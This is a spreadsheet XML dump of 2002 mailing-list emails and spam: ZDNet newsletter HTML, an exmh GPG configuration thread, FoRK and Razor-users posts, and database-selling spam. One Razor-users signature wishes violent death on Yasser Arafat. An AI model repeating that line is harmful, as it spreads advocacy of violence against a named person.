         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzF9OBlxtGzeFOPq1FsnynR"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href="http://clickthru.online.com/Click?q=a8-02XZQQZDjuerEN6DtZs6swzdONiR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7pV9LbqKtqpAEVgnfqGsJPR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULs_KA-3PW3Gl22vbAOyenR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVceNvMCD0VqS8CMB0qvseR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwTaZFP4xPa9-0t3VVat9yR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPmsepxjX3VynhNBuCqlR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMxeryPsSdBBBkqU8niQ74R" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxK72zLonFPcZsjpRp-LrR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0cwu063rwASOnO8CtmMgRR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-22" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=67-PnOknqEORnCwwAynubeTJ6SQE9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Here's a message that works fine for me:
 X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
 To: kevinc@doink.com
 Subject: gpg test
 Mime-Version: 1.0
 Content-Type: text/x-pgp; format=mime; x-action=encrypt;
 	x-recipients="D165C0CC, D165C0CC"
 Content-Transfer-Encoding: 7bit
 Date: Wed, 11 Sep 2002 13:18:58 -0700
 From: Kevin Cosgrove &lt;kevinc@dOink.COM&gt;
 Message-Id: &lt;20020911201900.492892FEAB@joseph.doink.com&gt;
 -----BEGIN PGP MESSAGE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 Comment: Exmh version 2.5 10/15/1999
 blah, blah, blah
 -----END PGP MESSAGE-----
 It could be that your content type of text/plain is messing you up.
 Your config stuff looks substantially the same as mine.
 Cheers....
 On 11 September 2002 at 16:11, Hacksaw &lt;hacksaw@hacksaw.org&gt; wrote:
 You may assume the X's were originally a valid address.
 X-em-version: 5, 0, 0, 4
 X-em-registration: #01E0520310450300B900
 X-priority: 3
 X-mailer: My Own Email v4.00
 Mime-version: 1.0
 Content-type: text/plain; charset=US-ASCII
 Subject: Discussion
 From: "XXXXXXX" &lt;XXXXXXX@XXXXXXXXX.com&gt;
 Date: Tue, 10 Sep 2002 05:47:46 -0500 (06:47 EDT)
 To: hacksaw@hacksaw.org
 *gpgRfc822:     0
 *gpgChooseKey:  1
 *gpgRunTwice:   1
 *gpgCacheIds:   persistent
 *gpgMinMatch:   75
 *gpgShowInline: none
 *gpgShortMessages:      1
 *gpgAutoExtract:        1
 *gpgKeyServer:  pgp-public-keys@keys.pgp.net
 *gpgKeyQueryMethod:     hkp
 *gpgHKPKeyServerUrl:    keys.pgp.com
 *gpgKeyServerURL:       http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op
 =get&amp;search=0x%s
 *gpgKeyOtherMethod:     exec echo "can't find $id" &gt; $tmp
 *gpgComment:    Exmh version 2.5 08/15/2002
 *gpgModulePath: /usr/lib/gnupg
 *gpgCipherMods: skipjack idea
 *gpgDigestMods: tiger
 *gpgPubkeyMods: rsa
 *gpgPgp5Compatibility:  1
 *gpgCipherAlgo: 3des
 *gpgDigestAlgo: sha1
 *gpgCompressAlgo:       zip
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: calling wayne baisley, the 12-Step Calvinist
</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; help me out here.
  &gt; You around?
 Barely, but don't call me Shirley.  ;-)
 I'm sleeping with one eye open.
 I wouldn't have married me if I'd known how extremely shallow my 
 politics are.
 "The ward lurks in Wisteria's maze."
 Cheers,
 Wayne
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == James Rogers &lt;jamesr@best.com&gt; writes:
     J&gt; ...  They aren't selling the software, which is pretty pricy as
     J&gt; it happens.  They are using it to optimize next generation
     J&gt; wireless canopies over metro areas and fiber networks on a
     J&gt; large scale.  There are an essentially infinite number of metro
     J&gt; wireless configurations, some of which generate far more dead
     J&gt; or marginal spots and others which are very expensive to
     J&gt; operate (due to backhaul transit considerations) or both.  This
     J&gt; software can be used as a tool to optimize the canopy coverage
     J&gt; and minimize the actual transit costs since the wireless is
     J&gt; tied into fiber at multiple points.
 So you only need to map a handful of metropolitan areas?
     J&gt; Or at least investors find this capability very sexy and
     J&gt; compelling
 Ah ... now /that/ I will believe :)
 Don't mind me; I'm just getting even more cynical in my old age.   
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Content management for MP3s
</t>
  </si>
  <si>
    <t xml:space="preserve">At 09:02 AM 9/29/02 -0700, Elias wrote:
 &gt;I'm about to undertake a massive project to index/catalog well over one 
 &gt;thousand CDs that have been ripped to MP3 and set up a server to stream 
 &gt;them to different rooms in the house. (Yes, I own them all, no I'm not 
 &gt;broadcasting them to the 'net.) Can anyone give me some recommendations as 
 &gt;to what (free? opensource?) software is best suited for this task? I know 
 &gt;there are a few FoRKs out there who have tackled this problem before...
 See if http://www.jwz.org/gronk/ meets your needs.
 Udhay
 -- 
 ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Whither vCard?
</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone know what happened to vCard support in Netscape 7.0/Mozilla 
 1.1?
  (Not there yet in Mozilla and therefore not in the new mail engine I 
 presume?)
 Netscape Messenger/Mozilla have LDAP LDIF import/export, but I can't 
 find vCard or a reference to it anywhere.  I like the Netscape/Mozilla 
 email client.  I avoid LookOut for at least two reasons: Windows Only 
 (my main environment is Linux with 30% on Windows) and security issues.
 Now that LDAP, and the related DSML and DNS SRV record methods, are 
 becoming more popular, is there a decline of vCard?
 Is there a standard emerging to deal with the mismatch in naming between 
 the two?
 I've brushed with directories in the past, but I'm getting in deep along 
 with more PKI oriented focus.  Any wisdom would be appreciated.  In 
 particular, I'm going to start integrating smart cards into my linux and 
 Win32 systems and integrating them with Netscape Messenger/Mozilla and 
 Outlook.
 Thanks
 sdw
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002 bitbitch@magnesium.net wrote:
 &gt; &gt;&gt; Fear not poor Tom, between the pain &amp; endorphins and/or massive
 &gt; &gt;&gt; amounts of drugs, she should remember little of the process. Her body
 &gt; &gt;&gt; is designed to block out the whole event, so that she can tell other
 &gt; &gt;&gt; women "oh having the baby wasnt so bad, you should have one!". Why
 &gt; &gt;&gt; else would any woman be willing to EVER have sex.
 &gt;
 &gt; Having not had a baby meself, but having listened to my mother and
 &gt; countless others retell the tale, I'd reccomend to Adam a few bits of
 &gt; advice:
 &gt; 1)  We don't generally have sex just to get preggers.
 I was of course refering to the last 100 million years or so, the last 50
 are just a blip.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 28 Aug 2002 13:51:21 +0700
     From:        Robert Elz &lt;kre@munnari.oz.au&gt;
     Message-ID:  &lt;18366.1030517481@munnari.OZ.AU&gt;
   | But, while I was playing there, I noticed something I never new before.
 I also no the difference between new &amp; knew, but I don't always type well...
 Um, I mean, I know the difference...
 kre
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Punch bags filled with incontinence pads
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://www.thisislocallondon.co.uk/news/weird/display.var.633932.Bizarre+London.0.html
 An investigation has been launched after punch bags on sale in Greenwich 
 were found to be stuffed with incontinence pads and bandages.
 Trading standards officers, working for Greenwich Council, were alerted to 
 the situation after a Bryan punch bag, purchased in Argos, in Charlton Road, 
 Charlton, was found to be full of bandages.
 Also stuffed inside the piece of sporting equipment was a letter from a 
 woman in Fife stating how she felt quite disgusted' about the bag and asking 
 for the filling to be tested.
 The unfortunate shopper had bought his first bag, at Argos, in Lewisham High 
 Street, but had returned it because on investigation of a leak he was 
 horrified to discover it was filled with incontinence pads.
 So far, officers have purchased two of the punch bags, only to find they 
 contain incontinence pads and strips of shredded duvet.
 Cabinet member for public services Councillor Angela Cornforth said: "This 
 is one of the strangest stories I have every heard.
 "Our officers are in the process of investigating and will no doubt discover 
 why the bags contain such unusual contents."
 12:18 Tuesday 8th October 2002
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt; writes:
     E&gt; ...  If my environment cannot be made beautiful, in
     E&gt; some sense I cannot live.
   "The first question I ask myself when something doesn't seem to be
   beautiful is why do I think it's not beautiful. And very shortly you
   discover that there is no reason." -- John Cage
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Greg&gt; In case it wasn't obvious, I'm a strong proponent of filtering
     Greg&gt; junk mail as early as possible, ie. right after the SMTP DATA
     Greg&gt; command has been completed.  Filtering spam at the MUA just seems
     Greg&gt; stupid to me -- by the time it gets to me MUA, the spammer has
     Greg&gt; already stolen my bandwidth.  
 The two problems I see with filtering that early are:
     1. Everyone receiving email via that server will contribute ham to the
        stew, making the Bayesian classification less effective.
     2. Given that there will be some false positives, you absolutely have to
        put the mail somewhere.  You can't simply delete it.  (I also don't
        like the TMDA-ish business of replying with a msg that says, "here's
        what you do to really get your message to me."  That puts an extra
        burden on my correspondents.)  As an individual, I would prefer you
        put spammish messages somewhere where I can review them, not an
        anonymous sysadmin who I might not trust with my personal email
        (nothing against you Greg ;-).
 I personally prefer to manage this stuff at the user agent level.  Bandwidth
 is a heck of a lot cheaper than my time.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Upgraded to Razor 2.14
</t>
  </si>
  <si>
    <t xml:space="preserve">I just want to say - RAZOR v2 ROCKS!  Under Razor v1, we were doing good to
 detect 20% of our spam with Razor.  I have only had it running since last
 night, but it is detecting a whopping 63%!  Of course I would like to see
 that number climb higher eventually, but that is a very big improvement!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</si>
  <si>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 Al'Qaeda's fantasy ideology: Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;[...] If it wasn't DeSoto ... then who was it that landed in Southern
 &gt;Florida to be greeted by great cities of millions of mound-dwellers
 &gt;who had completely vanished by the time Cortez arrived to kill as many
 &gt;as he could?
 The tooth fairy?
 There were never millions of natives in Florida (until recently :).
 Cortez never went to Florida, AFAIK.  Ponce de Leon discovered it.
 The Indian peoples he found there stuck around until a bunch of them
 moved to Cuba with the Spanish when a bunch of Seminole Indians
 invaded from the North with the English, in the seventeenth century.
 The remainder merged in with the new population, or died, or whatever,
 and their culture disappeared.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Routine problem; this time it's mine.
</t>
  </si>
  <si>
    <t xml:space="preserve">
     I hate to ask...I've heard it mentioned several times here, but I couldn't find a digest, and the hits I found on Google turned up missing pages.  :(
     I thought I was reporting spams all this time...the last month or so...but I wasn't.  I had a pathing problem going on, and a log-pathing problem, too, but hadn't noticed it yet.  Now, the system seems to be working, other than this message in the logs:
     nextserver: Could not get valid info from Discovery Servers
     What's the fix for this again?  Is it a server outtage, or something else?
     I'm using the 2.03 sdk, and the new 2.14 agent...
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 I don't want to hear news from Isreal until the news contains the words
 "Bullet", "Brain", and "Arafat".
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Engineers can't sell !!
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you agree?
 There are exceptions of course, but generally, technically minded-people
 aren't very 
 comfortable wiith having to sell. 
 I've spent the last 8 years teaching people in engineering and other
 technical companies 
 the best way to go about finding new customers, handling enquiries and
 closing sales. 
 We run the 'Selling for Engineers' seminar in-house for companies of any
 size, both in the 
 UK and worldwide. 
 The content of that seminar is contained in the 'Selling for Engineers'
 manual. price 27.00 
 UK pounds Other titles are: 'How to Hire a Good Technical Salesperson',
 'How to Create 
 Powerful Technical Sales Literature' and 'Prospecting for Engineers'. Each
 of these titles is 
 priced 37.00.
 If you want to sell your products in the UK we can supply accurate
 prospecting databases 
 for virtually all activities and products. The UK Technology Database has
 285,000 
 engineering, technical and scientific companies, price 79.00
 Other specialised databases: Computing 22,159 records, Construction,
 240,299 records, 
 Education, 39,416 records, Garage Services 71,933 records, Medical, 56,037
 records, 
 Hospitality, 80,210, Insurance and Finance, 27,983, Professionals,
 186,126, Retail, 
 157,859, Sport &amp; Leisure, 38,972, Transport, 67,262, Manufacturers,
 52,227. Price 99.00  
 each. If you can't see what you need, please contact us, we have more than
 can be listed 
 here. Also 40,000 validated, UK technical company e-mails 600.00 or 3
 pence each. Min 
 order 45.00.
 Contact Robert Seviour, UK Technology Database Ltd. 
 1 East Bay, North Queensferry, Fife, KY11 1JX, Scotland, UK
 Tel: +44 (0)1383 411 900   Fax: +44 (0)1383 411 656
 e-mail:  ukdatacd@totalise.co.uk
</t>
  </si>
  <si>
    <t xml:space="preserve">Me too, I prefer the close button in the upper left corner as well.  I
 found nice border themes Iridium-Blueish-0.3.tar.gz and
 Iridium-Greenish-0.3.tar.gz but forgot where I got them from.
 If you can find, they're worth a try.
 Lance
 On Fri, 2002-08-09 at 10:30, Matthias Saou wrote:
 &gt; Once upon a time, Harri wrote :
 &gt; 
 &gt; &gt; My personal problem with gnome2 is that all the wm (metacity) themes are
 &gt; &gt; windows themes with different colours. :) There's one pretty
 &gt; &gt; nice-looking one from the place where you can get "stylish" theme..
 &gt; &gt; forgot where, have to look it up.
 &gt; 
 &gt; I've found some nice Metacity themes, including the Crux one I like so much
 &gt; on www.sunshineinabag.co.uk. They've also got nice gtk2 themes and really
 &gt; cool gdm ones. My only regret here is that I liked the ability of choosing
 &gt; where the buttons were placed in the sawfish Crux theme, as I prefer the
 &gt; close button in the upper left corner :-/
 &gt; 
 &gt; Matthias
 &gt; 
 &gt; -- 
 &gt; Matthias Saou                                World Trade Center
 &gt; -------------                                Edificio Norte 4 Planta
 &gt; System and Network Engineer                  08039 Barcelona, Spain
 &gt; Electronic Group Interactive                 Phone : +34 936 00 23 23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</si>
  <si>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Subject: Re: [ILUG] Dell GX260 V Redhat 7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 09:28:57AM +0100, Hunt, Bryan mentioned:
 &gt; I'm not knocking dell in general, my next machine is going to be a dell.
 &gt; But buying a random dell box is likely to result in much tearing out of
 &gt; hair. 
  Buying any new machine is going to cause problems with a six month old
 set of drivers. Same happens in windows - you have to go get your drivers.
  Yes, dell use the most recent stuff they can, to save money. That's not a
 bad thing. Just a bad thing for those that hope a distro will work out of
 the box.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: spamassassin.taint.org
</t>
  </si>
  <si>
    <t xml:space="preserve">I discovered jmason.org in Yahoo, my favorite directory. I am requesting that you create a link from jmason.org to my client's web site if you feel that their content is in some way related or complements your site. In exchange, I'll post a link from their site to yours.  
 Exchanging links will help bring in more business for both your web site and my client's. An added benefit is increased search engine traffic because the search engines rank sites higher that have a good number of relevant links.
 This is not a free-for-all link exchange, I don't waste my time with them and you shouldn't either. I am only linking to related web sites so that all my links are relevant to my site.
 I would like to send you my client's web address, so that you can review their site. My client offers web site promotion and and optimization services for search engines. 
 Please let me know if you are interested in exchanging links. I'll send you more details once I hear back from you.
 Looking forward to your reply.
 Sincerely,
 Donna Martos
 donnamartos@link-builder.com
 http://www.link-builder.com
 P.S. If for any reason you don't want me to contact again, just email me and let me know.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: What to look for in your next smart phone (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=9d-kkCWQv0umMiPm9RuKLvd75wKZzPR" &gt;&lt;img src="http://www.zdnet.com/techupdate/i/itnewsletter_today.gif" width="440" height="60" border="0"  alt="Tech Update Today"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=160 align=center valign=top rowspan=2 bgcolor="#ffffff"&gt;
         &lt;img src="http://www.zdnet.com/techupdate/i/gl_ad2.gif" width="160" height="16" border="0"  alt="Advertisement"&gt;&lt;br&gt;
         &lt;!--tower --&gt;
        &lt;div align="center"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKTqeVECndAE64qDAwrPGrR" target="new"&gt;
 &lt;img src="http://www.techrepublic.com/images/ads/AMDProcessingSky.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=c8-2lPnQWOzdDv4YnmMKE-nFr99H2iR"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10, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWd3DVf1zgGZP85eXsJh-PR" &gt;
 &lt;b&gt;What to look for in your next smart phone&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 With PDAs and cell phones on the fast path to convergence, choosing the right 
 device is harder than ever. Before you buy one more handheld, see my prescription 
 for mobile happiness.
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCe34s_A0pvVdi5Z7ednR" &gt;
 	 &lt;b&gt;Reader: Kyocera is stepping stone to the perfect smart phone&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=07-HqCzI5rq9Ttfx8KiqzUbrvLkiDeR" &gt;Microsoft eyes Visa users with Passport&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr43m35wPjn9kgGa2oXqGyR" &gt;No jitters here: IBM drives tap new tech&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsD07nCayyLxjkqVAXXblR" &gt;Telecom firm leaks student data to Web&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDSNb7Qsta1cN0535V0Y9R" &gt;Israel, Hong Kong hotbed for cyberattacks&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUXl_6moxCjjvDSwizzcR" &gt;Microsoft puts content software to the test&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcfHsVddAqwuBXvl3NU2FR" &gt;Micron: PC demand to boost chip sales&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJonnkOZ9JSjaeTldfVpf4R" &gt;Flash! Macromedia tools speak up&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo2pUpd1d0dAVJ9PZAKTrR" &gt;Will Dell delve into printers?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJr-S9XoW6dxQMKtNX8PQiR" &gt;&lt;b&gt;More Enterprise News&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=6 width=1&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/td&gt;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src="http://techupdate.zdnet.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Tackling tough issues in e-customer service&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Identity services let e-commerce sites better serve customers and secure their 
 transactions. Both &lt;b&gt;Passport&lt;/b&gt; and the &lt;b&gt;Liberty Alliance&lt;/b&gt; offer merchants 
 some ability to recognize customers. Check out this overview of today's identity 
 services--and find out why &lt;b&gt;PKI&lt;/b&gt; is not dead yet. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-czTk_zSROUJEymxqPR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="150" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://i.i.com.com/cnwk.1d/i/ne/pt/2002/07/070902ToshibaSatellite1955.jpg" width="150" height="150" border="0" align="right"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P&gt;
   &lt;font size="+1"&gt;
   &lt;b&gt;Toshiba releases monster notebook&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Weighing in at 9.6 pounds, the new &lt;b&gt;Toshiba Satellite 1955-S801&lt;/b&gt; notebook 
 has a 2.2GHz Pentium 4 desktop processor and a huge 16-inch display. The 
 &lt;b&gt;desktop-replacement notebook&lt;/b&gt; category also includes the Satellite 1905 
 that Toshiba introduced last month, as well as products from Hewlett-Packard. 
 Gateway and Dell may be looking at the concept too.  The Satellite 1955 will 
 cost $2,499 and sports a few features not found in other desktop-replacement 
 notebooks, including a detachable wireless keyboard and wireless mouse. 
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_no55djbjsMVKpv3DxnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!--STORY 4--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="left"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/tu_lschlesinger.gif" width="85" height="110" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Clone, clone, clone your disks&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Imaging software can help you roll out new systems faster, right? The catch is that fine print requirement for "identical client hardware." But Tech Update's &lt;b&gt;Lee Schlesinger&lt;/b&gt; says new technology from IBM may be a quantum leap for disk imaging. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvFV__HKqBxDVAmoBameR" &gt;
 &lt;b&gt;Read his full commentary&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="123" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://www.zdnet.com/enterprise/graphics/070902_tan_quote.jpg" width="220" height="193" border="0" align="left"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Tech gets set for China breakthrough&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It's one of the few words that can perk up a high-technology executive these 
 days: China. Companies have attempted to tap the country's &lt;b&gt;enormous potential&lt;/b&gt; 
 for years, but it has become a far more attractive target recently as 
 the rest of the world remains mired in &lt;b&gt;economic problems&lt;/b&gt;. Now, the People's 
 Republic of China has become one of the leading strategic opportunities for 
 Intel, Nokia, Hewlett-Packard and virtually every other multinational. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQWZpsA98BbBL7kOi_yR" &gt;
 &lt;b&gt;Read part one of this special report&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Poll: What will be the primary role of TabletPC?&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Tech Update readers see &lt;b&gt;no shortage of applications&lt;/b&gt; for Microsoft's TabletPC. 
 Some of you want one, many of you say you need one. But what will be the primary role 
 of TabletPC: Vertical applications? A notebook/desktop replacement? Home use? 
 Or will it meet the same fate as previous tablet attempts?
